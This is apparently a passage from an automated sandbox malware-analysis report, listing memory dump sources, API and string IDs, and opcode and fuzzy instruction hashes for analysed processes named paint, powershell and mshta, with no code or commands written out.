                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                                • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                                • Instruction ID: 1248eb2e0edb7a13df03bfeee9d771d34271181080581012650bfa16a04786cc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6141B472B18A4595DB208F25E8443A96765FB99794FC08031EE5EC77D8EF3ED401C740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2016607190.00007FFE00761000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016576633.00007FFE00760000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE007E3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE0080D000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE00818000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016607190.00007FFE00823000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016859124.00007FFE00827000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2016893620.00007FFE00829000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffe00760000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Time$System$File
                                                                                                                                                                                                                                                                • String ID: gfff
                                                                                                                                                                                                                                                                • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                                                • Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                                                • Instruction ID: dd9afd47a17b20d07f16837a4d6ad0e51b85fcdb3d73576fa96add59b5c094ab
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7221D572A0968B86DB98DF29D4003B976E4FB89B84F488139DB4E87769DE3CD1418B01
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                                • Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                                                                                                                                                                                                                                • Instruction ID: 1649b0adae0421e439bd1163fabc03e1f2b7601d75be50cd600468e237bf34c7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58210463B0828296FB209B11D04426D73B2FB85B44FD58035DAAE837D4EF7EE945CB40
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                                • Instruction ID: de9154bc5d2f83437673e0bf81cc70f8c64743efad34a3845752fa93014ab389
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB116D32609B8192EB208F15F400269B7E5FB89B85F984230DF9E477A9EF3DC551CB00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                                • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                                • Instruction ID: 66c3e0b18368ed52c6b718f302a14bb7ebdb5486661301eb11f00261e34a9cc3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1501846692C20395F720AFA0986627E63A4EF56749FC00035D56EC37D1FF3DE9048B15
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1927570108.00007FFD99410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99410000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd99410000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: cbf5ae137aac3e34df341bdf956f2cb2e88e37023d5c053c7d71430bebc5e299
                                                                                                                                                                                                                                                                • Instruction ID: 91a2a6894c0756165824c4054900d56cb99823f1e8766e06060f33c8737fb5f7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbf5ae137aac3e34df341bdf956f2cb2e88e37023d5c053c7d71430bebc5e299
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98D1F352B0EBC50FE7B79B7818755607BE1EF66214B0901FBD099CB1D3E908AC09C76A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1927570108.00007FFD99410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99410000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd99410000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 4a972bb54cc5304d8147a8a0f29c543db00479128e6e172f4dfc818fb9583682
                                                                                                                                                                                                                                                                • Instruction ID: da040a4576d3a34dfd1541212de11f96082c385d0fb2eab38e69d9aa741891a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a972bb54cc5304d8147a8a0f29c543db00479128e6e172f4dfc818fb9583682
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00C13C22B1EA890FEBB6DFA848655B57BD1EF65358B1401BED05DCB0D3D918EC04C346
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1923341802.00007FFD99340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99340000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd99340000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: e765c092120ae046fc58791ad10754d0990c8ba92be57e9cb8abb7e3fce6f475
                                                                                                                                                                                                                                                                • Instruction ID: 552a5bc05d30ac7a74246d63e951ed67d4ad5932758e1af6d0d844be7c593f43
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e765c092120ae046fc58791ad10754d0990c8ba92be57e9cb8abb7e3fce6f475
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FC1C763A0E6D64FE7669F6C58B55E83BA0EF12258B0E00FBC0984B097DD15781A8357
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1927570108.00007FFD99410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99410000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd99410000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 6db95cdd08a41a73e6bc31a972305ca04109870f486cc2d6b94feabd87b2f14a
                                                                                                                                                                                                                                                                • Instruction ID: 526aefa230a476b20a729f6ae2ccaf78d7f74c4709d3e9db4b8f64c8cd94fcd7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6db95cdd08a41a73e6bc31a972305ca04109870f486cc2d6b94feabd87b2f14a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9481F561B0EB850FE7BB9A6848651707BD1EF66618B0901FAD08CC7193DD186C06CB6A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1927570108.00007FFD99410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99410000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd99410000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 3b0bd9532193158f6153010271636a2c086b93b7d6b8a383ab33623336b48560
                                                                                                                                                                                                                                                                • Instruction ID: 8537e5df81604dd8e8ec3edd1faac45df1843bab2d48fc0046b2fb8355ecf052
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b0bd9532193158f6153010271636a2c086b93b7d6b8a383ab33623336b48560
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8413862B0DA890FE7BADE6C44A467037D2EFB4714B0901BED09DC7283DD19AC05CB56
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1923341802.00007FFD99340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99340000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd99340000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 399eb95226880245e23b8cba670f7e25e006d45ba5683b57ee15d5da7b8fbcd8
                                                                                                                                                                                                                                                                • Instruction ID: b2eecfc2f8a1c72a7e8838fb22c3cab307b738793f7f077d69bf0b7fff69d988
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 399eb95226880245e23b8cba670f7e25e006d45ba5683b57ee15d5da7b8fbcd8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1731F331A1CB884FDB189F5C984A6A97BF0EB99711F00426FE449C3292DA30AC15CBC3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1921744256.00007FFD9922D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9922D000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd9922d000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5e591d5fff587f84947cb6195f3dcf0203141fb41ceb11a303cbf8a67c07195a
                                                                                                                                                                                                                                                                • Instruction ID: 25f8cf079fca255c02eb760b832601b434a006af221a3b86cf9731f4f6fa97ad
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e591d5fff587f84947cb6195f3dcf0203141fb41ceb11a303cbf8a67c07195a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F41253041DBC44FE76A8F2898559523FF0EF62324B5905EFD088CB1A3D629A849C793
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1927570108.00007FFD99410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99410000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd99410000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 8b0ae6312e29dd9fe6d819f334b1ae786695d3c03774f5449f2909309d9b75a0
                                                                                                                                                                                                                                                                • Instruction ID: 34d07b0b8e71f85ed1f64145d055928ee3896e62a6603bf941fcf9e49a3aabf8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b0ae6312e29dd9fe6d819f334b1ae786695d3c03774f5449f2909309d9b75a0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05212931B0D6894FE776DEA840605787B91DF6A358F1841BEC04DCB183C919EC41C345
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1923341802.00007FFD99340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99340000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd99340000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                                                                                • Instruction ID: 8cc4b37afc9d78ccb6f6c62a154e36d628409c241ade2105c34722f64bf282c4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5101A73121CB0D4FD744EF0CE051AA5B7E0FB85324F10056DE58AC3695DA36E882CB46
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1923341802.00007FFD99340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99340000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd99340000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 1361cf769c89d7ff07e30088a345874606b985e0bc07e0ede67d67ccef68c7f4
                                                                                                                                                                                                                                                                • Instruction ID: 34cf097abaffebc34621b9859eccd08af2333f244e77e168d998409b83b7395d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1361cf769c89d7ff07e30088a345874606b985e0bc07e0ede67d67ccef68c7f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5F046B661AACC4FCB51EF2CD8690D43FA0FFE1204B0501BFD598CB062D622A85CC782
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1927570108.00007FFD99410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99410000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd99410000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 9454b82340aab8c326a0cee6e1def514208fdc866200e037413a9d14ebe25037
                                                                                                                                                                                                                                                                • Instruction ID: 297ae579ff9bceacd35ac7b5add0039a061a5d70bc0df3c1b7e1c4a784a3b0d6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9454b82340aab8c326a0cee6e1def514208fdc866200e037413a9d14ebe25037
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F0BE32B0C6098FE7B9EB4CE4548A873E0EF5932471100BAE05DC70A7CA25EC44C786
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1927570108.00007FFD99410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99410000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd99410000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: ce1f3f4ca462746cdac419f2393b1fe295c8ce1602a06612df7a6e33649c2e5a
                                                                                                                                                                                                                                                                • Instruction ID: 21679693eedca74c5b8b3c3cdf9bf838f201d23101433c943dabe32227a33b10
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce1f3f4ca462746cdac419f2393b1fe295c8ce1602a06612df7a6e33649c2e5a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1F0BE32B0C5488FDB65EF4CE4508A8B7E0EF4932870100B6E159C70A3CA29AC44C785
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1923341802.00007FFD99340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99340000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd99340000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: O_^6$O_^<$O_^F$O_^I$O_^J
                                                                                                                                                                                                                                                                • API String ID: 0-2439779554
                                                                                                                                                                                                                                                                • Opcode ID: 3e6fa0ed0c7a8285a811329c0b66aa8ae9f81e811c2ebc220639df73f97a5571
                                                                                                                                                                                                                                                                • Instruction ID: b575352a9abbc44ed51499bed8be91106a9b4f8ca7bf59d166d55f2682346666
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e6fa0ed0c7a8285a811329c0b66aa8ae9f81e811c2ebc220639df73f97a5571
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D921477B32A4165ED30177AEB8009D87380CBD827734A01B3E26DCF647DD14648B86D8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1923341802.00007FFD99340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99340000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd99340000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: O_^$O_^$O_^$O_^$O_^
                                                                                                                                                                                                                                                                • API String ID: 0-1643777136
                                                                                                                                                                                                                                                                • Opcode ID: 5167a8f8cbb8801c8a804bf657af61d40fff4a8758237c91f9ea62b4592f2495
                                                                                                                                                                                                                                                                • Instruction ID: 3c04c23be4344c4c4fb512569f6642f2c11134eec99ff6689503f6371a74a11a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5167a8f8cbb8801c8a804bf657af61d40fff4a8758237c91f9ea62b4592f2495
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D93177A390F6DA5FF7669E785C790D53F90AF2225CB1B01FAC8D94F193ED1464268203
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1923341802.00007FFD99340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99340000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffd99340000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: O_^$O_^$O_^$O_^
                                                                                                                                                                                                                                                                • API String ID: 0-934926442
                                                                                                                                                                                                                                                                • Opcode ID: e66af2cb8ba224046a07a48ddaba2c7ab0218062da6ddd557ecb19f3856a941f
                                                                                                                                                                                                                                                                • Instruction ID: fc6384227c49f22e3c494b05b0779979526f5e91cf086ca1e97e609feb702aa0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e66af2cb8ba224046a07a48ddaba2c7ab0218062da6ddd557ecb19f3856a941f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB4198A3A0FAD61FF7265E6448791947F91EF52398B0E12FAC0D54F193E958681B8203
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000D.00000003.1739672384.0000019BE2EE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000019BE2EE0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_3_19be2ee0000_mshta.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                                                • Instruction ID: d1545c9b9c13203767f0dcd40d8d3ca15671f7d2012727fe2ab8ddd6f59ab132
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C90021449941659D41411D25D953EC50446388250FD448805416A0544D68D42A65153
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000002F.00000002.1905039023.00007FFD99430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99430000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ffd99430000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 8d6db50ee1e1c4cf04057d3d530323b6df3cb85f124819c3488b5d09b864c39e
                                                                                                                                                                                                                                                                • Instruction ID: 684b28e7a2ebd28c1cd4afe7ac13fad9a9f1f885bf6cc4c3cc5638665583a2ec
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d6db50ee1e1c4cf04057d3d530323b6df3cb85f124819c3488b5d09b864c39e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9222522B0EBCD0FE7679B7858625B47BE1EF5A214B0801FBD089C71D7E918A849C356
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000002F.00000002.1903750455.00007FFD99360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99360000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
